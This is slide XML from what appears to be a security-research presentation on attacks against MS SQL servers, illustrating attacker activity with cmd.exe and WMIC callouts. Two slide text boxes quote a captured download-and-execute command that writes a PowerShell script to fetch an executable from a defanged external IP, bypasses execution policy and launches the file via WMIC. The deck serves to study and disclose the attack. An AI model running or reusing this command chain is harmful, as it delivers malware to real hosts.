                    <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                    <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>tzt.bat</a:t>
                </a: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”</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="139" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A97DCF6-6451-8C2A-0C40-D5FEAEBE6527}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1862260" y="2244337"/>
              <a:ext cx="6098468" cy="467642"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln cap="rnd">
              <a:noFill/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="63500">
                <a:schemeClr val="accent4">
                  <a:alpha val="40000"/>
                </a:schemeClr>
              </a:glow>
              <a:outerShdw blurRad="381000" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
                <a:srgbClr val="D80B55"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1371600"/>
              <a:r>
                <a:rPr lang="en-US" sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Administrator: C:\\Windows\system32\</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>cmd.exe</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49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A205F28-ABE7-138F-A1D7-B372FFCCF984}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="914400" y="5498673"/>
            <a:ext cx="7961243" cy="3873927"/>
            <a:chOff x="9783551" y="1103017"/>
            <a:chExt cx="7961243" cy="3873927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E8EEE4CC-826B-857A-0BC7-A71DCF2EA390}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9783551" y="1103017"/>
              <a:ext cx="7961243" cy="3873927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solidFill>
                <a:srgbClr val="424D5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14" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1A6A5F4-3CBD-C2F0-C708-156174F4A5BC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9928227" y="1888978"/>
              <a:ext cx="7279854" cy="2477128"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/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811382">
                <a:defRPr/>
              </a:pP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/C echo $cl = New-Object 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System.Net.WebClient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&gt;%TEMP%\updt.ps1 &amp; echo $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cl.DownloadFile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(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effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"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effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>hXXp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effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>://80[.]66.75]]]].40/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effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>XXXXXXXXX.exe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effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"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, 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effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"%TEMP%\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effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>xxxx.exe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effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"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) &gt;&gt; %TEMP%\updt.ps1 &amp; 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powershell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-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ExecutionPolicy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Bypass %TEMP%\updt.ps1 &amp; WMIC process call create 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effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"%TEMP%\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effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>XXXXXXXX.exe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effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" kern="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="8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5433D77-FE4F-4076-60A5-3FDC9D6988AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9412357" y="5498673"/>
            <a:ext cx="7961243" cy="3873927"/>
            <a:chOff x="9783551" y="1103017"/>
            <a:chExt cx="7961243" cy="3873927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1001935F-5902-8157-133E-71FAF0AD9716}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9783551" y="1103017"/>
              <a:ext cx="7961243" cy="3873927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solidFill>
                <a:srgbClr val="424D5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20" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B08413DE-A43E-B77A-AF51-42456F0BF82D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9928226" y="2068146"/>
              <a:ext cx="7746993" cy="2551461"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="10795" cap="flat" cmpd="sng" algn="ctr">
              <a:noFill/>
              <a:prstDash val="solid"/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="63500">
                <a:schemeClr val="accent4">
                  <a:alpha val="40000"/>
                </a:schemeClr>
              </a:glow>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1811382">
                <a:defRPr/>
              </a:pP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"\"C:\\Windows\\\\System32\\\\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cmd.exe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\" /C echo $cl = New-Object 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System.Net.WebClient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&gt; C:\Users\MSSQLS~1\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AppData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\Local\Temp\updt.ps1 &amp; echo $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cl.DownloadFile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(\"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hxxp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://80.66.75[.]36/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aRX.exe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\", \"C:\Users\MSSQLS~1\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AppData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\Local\Temp\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tzt.exe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\") &gt;&gt; %TEMP%\\updt.ps1 &amp; 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powershell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-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ExecutionPolicy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Bypass C:\Users\MSSQLS~1\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AppData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\Local\Temp\updt.ps1 &amp; WMIC process call create \"C:\Users\MSSQLS~1\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AppData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\Local\Temp\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tzt.exe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\""</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" kern="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="8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</p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Graphic 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B8534E4-07C1-C400-CD79-FEEE469941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823503" y="5840056"/>
            <a:ext cx="2004062" cy="368563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E90C828A-2B6C-522D-5CAD-3F1BF75EE3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322317" y="5808437"/>
            <a:ext cx="2286000" cy="4318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CD6AD80-6138-3FF4-6A72-C0159E2CC311}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9920197" y="8399048"/>
            <a:ext cx="3635834" cy="485900"/>
            <a:chOff x="13335821" y="-166991"/>
            <a:chExt cx="3635834" cy="485900"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill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18A6B5EE-0DEC-2D9D-91FD-7411889A18E7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="13335821" y="-166991"/>
              <a:ext cx="3635834" cy="468180"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:grpFill/>
            <a:ln cap="rnd">
              <a:noFill/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="63500">
                <a:schemeClr val="accent4">
                  <a:alpha val="40000"/>
                </a:schemeClr>
              </a:glow>
              <a:outerShdw blurRad="381000" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
                <a:srgbClr val="D80B55"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" defTabSz="1371600"/>
              <a:endParaRPr lang="en-SK" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="IntelOne Display Regular"/>
                <a:cs typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4801368F-B4F8-479F-FA6E-939B0F7D3AF6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14607426" y="-148733"/>
              <a:ext cx="1095151" cy="467642"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln cap="rnd">
              <a:noFill/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="63500">
                <a:schemeClr val="accent4">
                  <a:alpha val="40000"/>
                </a:schemeClr>
              </a:glow>
              <a:outerShdw blurRad="381000" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
                <a:srgbClr val="D80B55"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" defTabSz="1371600"/>
              <a:r>
                <a:rPr lang="en-US" sz="200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WMIC process call create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D57E5C5-2B42-4B96-F300-F65377B52C12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1029258" y="4366135"/>
            <a:ext cx="4484430" cy="486665"/>
            <a:chOff x="14607425" y="-185476"/>
            <a:chExt cx="4484430" cy="486665"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill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C860914B-CE81-361D-0D88-1D00ED04DC3A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14607425" y="-166991"/>
              <a:ext cx="4441239" cy="468180"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:grpFill/>
            <a:ln cap="rnd">
              <a:noFill/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="63500">
                <a:schemeClr val="accent4">
                  <a:alpha val="40000"/>
                </a:schemeClr>
              </a:glow>
              <a:outerShdw blurRad="381000" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
                <a:srgbClr val="D80B55"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" defTabSz="1371600"/>
              <a:endParaRPr lang="en-SK" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="IntelOne Display Regular"/>
                <a:cs typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F90F9BD-07D3-7F60-9C6F-6CC911C0125B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14650615" y="-185476"/>
              <a:ext cx="4441240" cy="467642"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:grpFill/>
            <a:ln cap="rnd">
              <a:noFill/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="63500">
                <a:schemeClr val="accent4">
                  <a:alpha val="40000"/>
                </a:schemeClr>
              </a:glow>
              <a:outerShdw blurRad="381000" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
                <a:srgbClr val="D80B55"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" defTabSz="1371600"/>
              <a:r>
                <a:rPr lang="en-US" sz="240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WMIC process call create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362747E-B870-D806-7DA7-AA4E30DFB3EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3648909" y="7878660"/>
            <a:ext cx="3635834" cy="485900"/>
            <a:chOff x="13335821" y="-166991"/>
            <a:chExt cx="3635834" cy="485900"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill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E6FAB2E2-B707-577B-DB1E-4152E18699A0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="13335821" y="-166991"/>
              <a:ext cx="3635834" cy="468180"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:grpFill/>
            <a:ln cap="rnd">
              <a:noFill/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="63500">
                <a:schemeClr val="accent4">
                  <a:alpha val="40000"/>
                </a:schemeClr>
              </a:glow>
              <a:outerShdw blurRad="381000" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
                <a:srgbClr val="D80B55"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" defTabSz="1371600"/>
              <a:endParaRPr lang="en-SK" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="IntelOne Display Regular"/>
                <a:cs typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7240B078-9519-CE03-17EE-0F65B81C33BA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="13335822" y="-148733"/>
              <a:ext cx="3635833" cy="467642"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:grpFill/>
            <a:ln cap="rnd">
              <a:noFill/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="63500">
                <a:schemeClr val="accent4">
                  <a:alpha val="40000"/>
                </a:schemeClr>
              </a:glow>
              <a:outerShdw blurRad="381000" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
                <a:srgbClr val="D80B55"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" defTabSz="1371600"/>
              <a:r>
                <a:rPr lang="en-US" sz="200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WMIC process call create</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="40" name="Group 156">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A198153B-E046-2E0C-155E-875A4026021A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3531901" y="320276"/>
            <a:ext cx="1205793" cy="1205793"/>
            <a:chOff x="9228675" y="2933048"/>
            <a:chExt cx="4118889" cy="4118889"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="41" name="Group 157">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50806D0E-6F5F-8BE6-01D7-1233E88D8AC1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="9228675" y="2933048"/>
              <a:ext cx="4118889" cy="4118889"/>
              <a:chOff x="7931149" y="2626295"/>
              <a:chExt cx="4118889" cy="4118889"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="43" name="Group 159">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{825C668A-81CB-463F-A357-228AE18F2A66}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="11339954" y="3278140"/>
                <a:ext cx="522194" cy="527315"/>
                <a:chOff x="3190875" y="974570"/>
                <a:chExt cx="249325" cy="251770"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="45" name="Rectangle 161">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A683408-4A22-AF01-DB95-1771C30360D6}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3190875" y="974570"/>
                  <a:ext cx="112232" cy="1130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25"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="46" name="Rectangle 162">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD02AB51-D9A7-9D35-1B0A-F17501941121}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3327968" y="974570"/>
                  <a:ext cx="112232" cy="1130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25"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="47" name="Rectangle 163">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E2CE5D8-F002-535C-E08B-03B0ABF9A7E0}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3190875" y="1113316"/>
                  <a:ext cx="112232" cy="1130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25"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="48" name="Rectangle 164">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{660EB8AC-5E6F-1A68-30D3-1C26B5414452}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3327968" y="1113316"/>
                  <a:ext cx="112232" cy="1130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25"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="44" name="Graphic 160">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{403DCE12-6EC6-5323-7A1D-B911703FFF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p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="7931149" y="2626295"/>
                <a:ext cx="4118889" cy="4118889"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="Oval 158">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DD5AFDD-7C68-20A5-4F7B-0EB5F18A1FA3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10515933" y="4127841"/>
              <a:ext cx="1578270" cy="46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</p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="!!Agenda">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D353D653-61A0-B693-BB4F-C4CB001ADC6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1322317" y="670136"/>
            <a:ext cx="5358657" cy="838155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" defTabSz="187631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923"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1862" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1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defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4754" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="4754" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="4754" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> SQL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4754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469596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93D26-75A9-3982-8106-78D4F32EF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Gradient TEAL" descr="A green light in the dark&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5F75496-A3F1-A98B-0958-664D506BB41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144721" y="-5037820"/>
            <a:ext cx="30087414" cy="18514850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="!!Gradient PURPLE" descr="A purple line in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC18A80F-B127-4EDA-9ED5-2E2889F354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849229" y="1284780"/>
            <a:ext cx="30560502" cy="18285230"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="!!Gradient CRIMSON" descr="A red light in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
